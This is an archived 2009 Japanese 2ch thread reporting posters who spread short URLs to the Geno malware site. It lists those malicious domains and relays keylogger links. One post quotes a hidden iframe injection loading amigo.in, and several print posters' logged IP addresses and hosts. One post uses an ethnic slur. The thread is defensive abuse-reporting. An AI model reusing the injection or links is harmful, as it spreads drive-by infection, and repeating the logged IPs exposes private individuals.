複数板において、4/6現在、多くのアンチウイルスソフト未対応の
脆弱性を突いてウイルスに感染させるサイト(ttp://www.geno-web.jp/)へ
と誘導する短縮URLを、各スレッドの内容に合わせトラップとして貼り付ける、
もしくはただその短縮URLのみを貼り付けるマルチポスト荒らしを報告するスレです。
各種短縮URLの種類
http://is.gd/****
http://janp.biz/****
http://xurl.jp/****
http://jpan.jp/?****
http://go.2ch2.net/u/****
http://tinyurl.com/****
http://5jp.net/***
http://jpan.jp/?****
http://mo-v.jp/?****
【荒らしの特徴】
a) 投稿内容 投稿例 >>2にて報告
b) 規模頻度 max 21res/day
c) 爆撃範囲
ニュース速報(http://tsushima.2ch.net/news/) ニュース速報+板(http://tsushima.2ch.net/newsplus/)
ニュー速VIP(http://takeshima.2ch.net/news4vip/) 難民(http://jfk.2ch.net/nanmin/)
ネトゲ実況(http://dubai.2ch.net/ogame/) ネットwatch(http://pc11.2ch.net/net/)
大規模MMO(http://jfk.2ch.net/mmo/) 自己紹介(http://hideyoshi.2ch.net/intro/)
ハード・業界(http://dubai.2ch.net/ghard/) DTM(http://pc11.2ch.net/dtm/)
市況1(http://anchorage.2ch.net/livemarket1/) ネットゲーム(http://jfk.2ch.net/netgame/)
継続性:2009/04/05〜(継続中)
◆報告の注意
・http://info.2ch.net/wiki/index.php?%B9%D3%A4%E9%A4%B7%CA%F3%B9%F0
・書式を合わせて報告して下さい。フォーマットに沿っていないと原則スルーです。
◆書式
最新の書式はwikiを確認してください。
http://info.2ch.net/wiki/index.php?%B3%C6%B9%D3%A4%E9%A4%B7%CA%F3%B9%F0%A4%CE%BD%F1%BC%B0
・書式を合わせて報告して下さい。フォーマットに沿っていないと原則スルーです。
・書式4を推奨します。
・時系列で報告して下さい。
・曜日表示は消して報告して下さい。
・報告1レスあたり、指定するURLは10個迄、それ以上は分割して下さい。
◆報告に便利なツールあれこれ◆
・ものすごい勢いでIDとかをまとめるツール
http://houchi.net/2ch/adabuse.php
・あなたのお好きにまとめtool
http://halcyan.30.kg/myscan.php
・まとめツールのソートツール ver.alpha stable
http://houchi.net/2ch/abuseresort.php
・時系列ちゃん
http://www.geocities.jp/ch2dat/htmlmiller/with2ch_net_up_data/1117499001.html
キーワード抽出tool
http://halcyan.30.kg/myscan.php
★090406 複数板「ウイルスGeno短縮URL」誘導マルチポスト荒らし報告
■ このスレッドは過去ログ倉庫に格納されています
1 ◆mrBWi0WEjc
2009/04/06(月) 06:47:53ID:gWLJV9hT0197名無しの報告
2009/04/07(火) 11:18:18ID:njOAZAdCP 190みたいなのは精査しないで串でも携帯でも焼きです。
199名無しの報告
2009/04/07(火) 11:26:47ID:njOAZAdCP はい。削除人さんの任意です。
わたすでしたら即「あぼーん」します
わたすでしたら即「あぼーん」します
200 [―{}@{}@{}-] 雑魚『爽やかな風に揺られて』 ◆MOON///Uh6
NGNG >>194
> ・ピンポイントの永久規制だということ
確か ピンポイントに絞り込めるからこそ 焼けるのが BBM BBQじゃなかったかな〜(笑)
ピンポイントだから 焼くかどうか慎重に考えて って 条件とか関係なく常に慎重にみんなやってるだろ(笑)
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWwwwWWWww↑→
そもそも
> ・ピンポイントの永久規制だということ
> ・BBQ/BBMを参照しているサイトは2ちゃんねるだけではないということ
だからこそ 携帯で怪しいレスをすべきじゃない と投稿者へ言うならわかるが
焼き人へ考え方をしっかりしろとかいう理由に全然なってないわ(笑)
他のサイトでも書けなくなるからもうちょっと甘く鑑定しようや って逝ってるんだけど それ変じゃない(笑)
他のサイトの事とか 関係ないでしょ(笑)
これも逆に 他でも書けなくなるから2chへ怪しまれる可能性がある投稿は極力控えるのが無難だと
携帯利用者へよ〜く逝っとけ
> ・ピンポイントの永久規制だということ
確か ピンポイントに絞り込めるからこそ 焼けるのが BBM BBQじゃなかったかな〜(笑)
ピンポイントだから 焼くかどうか慎重に考えて って 条件とか関係なく常に慎重にみんなやってるだろ(笑)
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWwwwWWWww↑→
そもそも
> ・ピンポイントの永久規制だということ
> ・BBQ/BBMを参照しているサイトは2ちゃんねるだけではないということ
だからこそ 携帯で怪しいレスをすべきじゃない と投稿者へ言うならわかるが
焼き人へ考え方をしっかりしろとかいう理由に全然なってないわ(笑)
他のサイトでも書けなくなるからもうちょっと甘く鑑定しようや って逝ってるんだけど それ変じゃない(笑)
他のサイトの事とか 関係ないでしょ(笑)
これも逆に 他でも書けなくなるから2chへ怪しまれる可能性がある投稿は極力控えるのが無難だと
携帯利用者へよ〜く逝っとけ
201名無しでエラー ◆.LUJZ1J/.6
2009/04/07(火) 13:42:57ID:efEj6Pji0 >190はこっちのスレの取り扱い案件っぽいな
★090323 スパムURLスクリプト爆撃報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1237811682/
既に焼かれているみたいなんで報告はしないが
★090323 スパムURLスクリプト爆撃報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1237811682/
既に焼かれているみたいなんで報告はしないが
202名無しの報告
2009/04/07(火) 14:17:17ID:aH3X3TUN0 ヤキトリコテもうざいから焼いて欲しいな
結局キタチョンと同じで誰かがガツンとやってやらないと分からんのですよ
甘やかされて大きくなったガキとおんなじ
結局キタチョンと同じで誰かがガツンとやってやらないと分からんのですよ
甘やかされて大きくなったガキとおんなじ
205 [―{}@{}@{}-] 雑魚『爽やかな風に揺られて』 ◆MOON///Uh6
NGNG マルチポストという荒らし行為を取り締まろうと掘ってみたが
投稿ホストはバラバラだったので マルチポストという容疑はなかったのに
ココで焼き判断は下った
これは冤罪という奴だから 焼きを1回撤回しろ
その後 焼く正当な理由を示してから 焼いてみろよ
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWwwWWww↓→
と 論理的に説明して 解除すりゃいいだけじゃん>>203
なにをいつまでも 酔っ払いみたいにしつこく愚痴ってるのさ(笑)
マルチポスト以外の別の容疑で 改めて 焼き という手順は なんかループというかゴタゴタしてて焼き屋は嫌なんだろうが
正規な順だと思うよ!議論する余地があるということは 焼き保留状態でこそ じゃないのかな〜?
焼き保留する必要もない案件なら クレームをつけるべきじゃないし!
投稿ホストはバラバラだったので マルチポストという容疑はなかったのに
ココで焼き判断は下った
これは冤罪という奴だから 焼きを1回撤回しろ
その後 焼く正当な理由を示してから 焼いてみろよ
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWwwWWww↓→
と 論理的に説明して 解除すりゃいいだけじゃん>>203
なにをいつまでも 酔っ払いみたいにしつこく愚痴ってるのさ(笑)
マルチポスト以外の別の容疑で 改めて 焼き という手順は なんかループというかゴタゴタしてて焼き屋は嫌なんだろうが
正規な順だと思うよ!議論する余地があるということは 焼き保留状態でこそ じゃないのかな〜?
焼き保留する必要もない案件なら クレームをつけるべきじゃないし!
208名無しの報告
2009/04/12(日) 19:34:57ID:8/z1ue4R0 待ち?
209名無しの報告
2009/04/15(水) 00:20:55ID:GVBXOQiqP 606 :Trader@Live!:2009/04/14(火) 23:31:02 ID:22VAconQ
コの子は凄すぎ
ttp://lives.no-ip.biz/lives/sn/src/1280461.jpg
ttp://yy55.60.kg/test/read.cgi/aqaq1212/1186801948/1
KEY LOGGER貼りやがった。 試ねよコイツ。
コの子は凄すぎ
ttp://lives.no-ip.biz/lives/sn/src/1280461.jpg
ttp://yy55.60.kg/test/read.cgi/aqaq1212/1186801948/1
KEY LOGGER貼りやがった。 試ねよコイツ。
210名無しの報告
2009/04/15(水) 11:25:54ID:OgWwVFkC0 >209
貼られたスレのURLキボンヌ
貼られたスレのURLキボンヌ
211名無しの報告
2009/04/15(水) 11:27:50ID:CAjsGfzR0212名無しの報告
2009/04/15(水) 11:35:01ID:OgWwVFkC0 そうでなくて>209の内容が貼られた2chのスレのURLだよ
213 ◆Rocks/oCOQ
2009/04/15(水) 12:41:54ID:hxVuwYVs0 >209,211貼るな馬鹿ヽ(`Д´)ノ
215名無しの報告
2009/04/15(水) 15:57:18ID:XMO8mtg40 http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/209 2009/04/15 00:20:55 ID:GVBXOQiqP
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/211 2009/04/15 11:27:50 ID:CAjsGfzR0
こうだな
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/211 2009/04/15 11:27:50 ID:CAjsGfzR0
こうだな
216名無しの報告
2009/04/16(木) 05:12:35ID:5W8K+zMn0 >>215
正解
正解
217名無しの報告
2009/04/16(木) 09:26:23ID:XXjU8H6B0 >211
2ch型掲示板の0URL見るだけなら大丈夫と思ったら…やられた!
単なるブラクラだよねそうだよね?
2ch型掲示板の0URL見るだけなら大丈夫と思ったら…やられた!
単なるブラクラだよねそうだよね?
220名無しの報告
2009/04/18(土) 02:45:25ID:7lA+GD1O0 http://jfk.2ch.net/test/read.cgi/nanmin/1239017092/33 2009/04/18 02:35:14
222名無しの報告
2009/04/18(土) 02:59:41ID:l8yf04m/0 http://anchorage.2ch.net/test/read.cgi/livemarket2/1239974460/698 2009/04/18 00:09:20 ID:nNP2kpQa
226名無しの報告
2009/04/18(土) 03:20:59ID:Q6TthHre0 でもわんわんされてるぞ
yokoku.inのXSS事件で使われた「amigo.in」がyyカキコのXSS脆弱性?を利用して仕掛けられtるみたいですね
>>229
たぶん有害なウイルスとかは仕掛けられてないと思うけど
>>221にアクセス、iframeでamigo.inにも同時アクセスするので
踏まないが吉。。。と思います♪
ソースチェッカーオンライン@amigo.in
http://so.7walker.net/index.php?http%3A%2F%2Famigo.in%2Fhahahahahaha%2Foppai.html&dele=1
>>230
それはたぶんjavascriptかなんかでページ切り替え時のみ発動するように
なってるんじゃないですかね。。。
あんま詳しいこと知らないんですが。よくあるじゃないですか
偽アンチウイルスのサイトで移動しようとしたら、本当にシステムスキャンしないんでしょうか?的なアラートが出るやつ
たぶん有害なウイルスとかは仕掛けられてないと思うけど
>>221にアクセス、iframeでamigo.inにも同時アクセスするので
踏まないが吉。。。と思います♪
ソースチェッカーオンライン@amigo.in
http://so.7walker.net/index.php?http%3A%2F%2Famigo.in%2Fhahahahahaha%2Foppai.html&dele=1
>>230
それはたぶんjavascriptかなんかでページ切り替え時のみ発動するように
なってるんじゃないですかね。。。
あんま詳しいこと知らないんですが。よくあるじゃないですか
偽アンチウイルスのサイトで移動しようとしたら、本当にシステムスキャンしないんでしょうか?的なアラートが出るやつ
firefoxをお使いの方は「Noscript」ってアドオンを入れたら改竄系に対して
すこしは幸せになれるんじゃないかなと
すこしは幸せになれるんじゃないかなと
>>222
Trader@Live!<><>2009/04/18(土) 00:09:20 nNP2kpQa<>こんなことってあるんだね <br> <><>softbank220014100016.bbtec.net<>220.14.100.16<><>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Trader@Live!<><>2009/04/18(土) 00:09:20 nNP2kpQa<>こんなことってあるんだね <br> <><>softbank220014100016.bbtec.net<>220.14.100.16<><>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
>>220
名無し草<>sage<>2009/04/18(土) 02:35:14 hhvyOuGJ<>こっちに移動 <br> http://yy55.<;><>i58-89-22-241.s05.a015.ap.plala.or.jp<>58.89.22.241<><>Monazilla/1.00 (JaneView/0.1.12.1)
名無し草<>sage<>2009/04/18(土) 02:35:14 hhvyOuGJ<>こっちに移動 <br> http://yy55.<;><>i58-89-22-241.s05.a015.ap.plala.or.jp<>58.89.22.241<><>Monazilla/1.00 (JaneView/0.1.12.1)
>>215
名無しの報告<>sage<>2009/04/15(水) 00:20:55 GVBXOQiqP<>606 :Trader@Live!:2009/04/1<><>cw43.razil.jp(576055)121.110.68.44<>210.135.98.43<><>Monazilla/1.00 (P2/p2.2ch.net; p2-client-ip: 121.110.68.44; p2-user: 576055)
名無しの報告<>sage<>2009/04/15(水) 11:27:50 CAjsGfzR0<><a href="../test/read.cgi/sec2<><>softbank221029068196.bbtec.net[OnFFY8xPvSlGO06A]<>221.29.68.196<>OnFFY8xPvSlGO06A<>Monazilla/1.00 Live2ch/1.18
名無しの報告<>sage<>2009/04/15(水) 00:20:55 GVBXOQiqP<>606 :Trader@Live!:2009/04/1<><>cw43.razil.jp(576055)121.110.68.44<>210.135.98.43<><>Monazilla/1.00 (P2/p2.2ch.net; p2-client-ip: 121.110.68.44; p2-user: 576055)
名無しの報告<>sage<>2009/04/15(水) 11:27:50 CAjsGfzR0<><a href="../test/read.cgi/sec2<><>softbank221029068196.bbtec.net[OnFFY8xPvSlGO06A]<>221.29.68.196<>OnFFY8xPvSlGO06A<>Monazilla/1.00 Live2ch/1.18
237名無しの報告
2009/04/18(土) 03:47:11ID:Q6TthHre0 報告
>>215
>>220
ログ
>>234-236
《集計》
softbank220014100016.bbtec.net 1res
i58-89-22-241.s05.a015.ap.plala.or.jp 1res
cw43.razil.jp(576055)121.110.68.44 1res
softbank221029068196.bbtec.net[OnFFY8xPvSlGO06A] 1res
《まとめ》
【 ● 】
●[OnFFY8xPvSlGO06A] 1res
(うち接続先 softbank22102 1res
【 通常 】
softbank220014 1res
\.s05.a015.ap.plala.or.jp 1res
【 p2 】
576055 @ p2-user 1res
(うち接続先 KD\d+\.ppp-bb.dion.ne.jp ) 1res
>>215
>>220
ログ
>>234-236
《集計》
softbank220014100016.bbtec.net 1res
i58-89-22-241.s05.a015.ap.plala.or.jp 1res
cw43.razil.jp(576055)121.110.68.44 1res
softbank221029068196.bbtec.net[OnFFY8xPvSlGO06A] 1res
《まとめ》
【 ● 】
●[OnFFY8xPvSlGO06A] 1res
(うち接続先 softbank22102 1res
【 通常 】
softbank220014 1res
\.s05.a015.ap.plala.or.jp 1res
【 p2 】
576055 @ p2-user 1res
(うち接続先 KD\d+\.ppp-bb.dion.ne.jp ) 1res
>>233
yy55.60.kg/test/read.cgi/aqaq1212/1186801948/1
このURL自体が危険なんじゃないかと思います
#yyカキコのURLはgenoウイルスとは関係なさそうなので、このスレで扱うのものではないような気がするのですが。
yy55.60.kg/test/read.cgi/aqaq1212/1186801948/1
このURL自体が危険なんじゃないかと思います
#yyカキコのURLはgenoウイルスとは関係なさそうなので、このスレで扱うのものではないような気がするのですが。
240名無しの報告
2009/04/18(土) 05:46:18ID:3aQEL2rf0 >>240
ですです
<font color=green><b><iframe style=position:fixed;top:0px;left:0px; width=1 height=0 src=//amigo.in/hahahahahaha/oppai.html></iframe>
@全角に変換してますが上記のが原因です
ですです
<font color=green><b><iframe style=position:fixed;top:0px;left:0px; width=1 height=0 src=//amigo.in/hahahahahaha/oppai.html></iframe>
@全角に変換してますが上記のが原因です
243名無しの報告
2009/04/18(土) 15:19:32ID:MSwBmm3R0 215 本当に掘られててワラタw
■ このスレッドは過去ログ倉庫に格納されています
